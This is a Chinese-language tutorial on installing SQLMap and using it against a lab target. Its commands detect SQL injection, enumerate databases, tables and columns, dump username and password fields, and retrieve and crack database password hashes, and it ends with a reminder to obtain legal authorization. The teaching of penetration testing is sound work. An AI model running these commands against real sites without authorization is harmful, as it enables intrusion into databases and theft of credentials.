SQLMap 安装与使用详解<\/h1>

一、SQLMap 简介<\/h2>

SQLMap 是一个自动化的 SQL 注入工具，主要功能包括：<\/p>

扫描、发现并利用给定 URL 的 SQL 注入漏洞<\/li>
内置多种绕过插件<\/li>

支持多种数据库：MySQL、Oracle、PostgreSQL、SQL Server、Access、DB2、SQLite、Firebird、Sybase 和 SAP MaxDB<\/li> <\/ul>

SQLMap 支持的注入技术<\/h3>

基于布尔类型的盲注<\/strong>：根据返回页面判断条件真假<\/li>
基于时间的盲注<\/strong>：通过条件语句查看时间延迟判断是否执行<\/li>
基于报错注入<\/strong>：页面返回错误信息或注入语句结果<\/li>
联合查询注入<\/strong>：可使用 Union 的情况下的注入<\/li>

堆查询注入<\/strong>：可同时执行多条语句的注入<\/li> <\/ol>
二、SQLMap 安装<\/h2>
环境要求<\/h3>

Python 环境（支持 Python 2.6、2.7 和 3.x）<\/li>
推荐使用 Python 3<\/li> <\/ul>
安装步骤<\/h3>

从 Python 官网下载并安装 Python<\/li>
安装时勾选"Add Python to environment variables"或将 Python 安装目录添加到环境变量<\/li>
从 SQLMap 官网下载最新版 SQLMap<\/li>
打开 cmd，输入命令 python sqlmap.py<\/code> 验证是否正常运行<\/li> <\/ol> 三、SQLMap 基本使用<\/h2> 1. 判断是否存在注入<\/h3> 基本命令格式：<\/p> python sqlmap.py -u "目标URL"<\/span> <\/span><\/span><\/code><\/pre>示例：<\/p> python sqlmap.py -u "http:\/\/10.211.55.6\/Less-1\/?id=1"<\/span> <\/span><\/span><\/code><\/pre>注意<\/strong>：<\/p> 当注入点参数≥2个时，URL需加双引号<\/li> 运行后会提示检测到的数据库类型等信息，一般按回车继续<\/li> <\/ul> 2. 从文件加载HTTP请求<\/h3> python sqlmap.py -r 请求文件.txt <\/span><\/span><\/code><\/pre>适用于存在Cookie注入等情况<\/p> 3. 查询当前用户下的所有数据库<\/h3> python sqlmap.py -u "URL"<\/span> --dbs <\/span><\/span><\/code><\/pre>如果用户有权限，将列出所有数据库<\/p> 4. 获取指定数据库中的表名<\/h3> python sqlmap.py -u "URL"<\/span> -D 数据库名 --tables <\/span><\/span><\/code><\/pre>不加-D参数则列出所有库的表<\/p> 5. 获取表中的字段名<\/h3> python sqlmap.py -u "URL"<\/span> -D 数据库名 -T 表名 --columns <\/span><\/span><\/code><\/pre>6. 获取字段内容<\/h3> python sqlmap.py -u "URL"<\/span> -D 数据库名 -T 表名 -C 字段1,字段2 --dump <\/span><\/span><\/code><\/pre>示例：<\/p> python sqlmap.py -u "http:\/\/10.211.55.6\/Less-1\/?id=1"<\/span> -D security -T users -C username,password --dump <\/span><\/span><\/code><\/pre>7. 获取数据库所有用户<\/h3> python sqlmap.py -u "URL"<\/span> --users <\/span><\/span><\/code><\/pre>8. 获取数据库用户密码<\/h3> python sqlmap.py -u "URL"<\/span> --passwords <\/span><\/span><\/code><\/pre>会列出用户和密码Hash，并尝试破解<\/p> 9. 获取当前网站数据库名称<\/h3> python sqlmap.py -u "URL"<\/span> --current-db <\/span><\/span><\/code><\/pre>10. 获取当前网站数据库用户<\/h3> python sqlmap.py -u "URL"<\/span> --current-user <\/span><\/span><\/code><\/pre>四、参数缩写说明<\/h2> --dbs<\/code> → -D xxx<\/code> (指定数据库)<\/li> --tables<\/code> → -T<\/code> (指定表)<\/li> --columns<\/code> → -C<\/code> (指定列)<\/li> <\/ul> 五、注意事项<\/h2> 使用前确保获得合法授权<\/li> 某些操作需要较高权限才能执行<\/li> 不同数据库可能需要不同的参数和技术<\/li> 实际使用中可能需要结合其他参数如cookie、代理等<\/li> <\/ol> SQLMap 功能强大，上述命令只是基础用法，实际渗透测试中可根据需要组合使用各种参数和技巧。<\/p>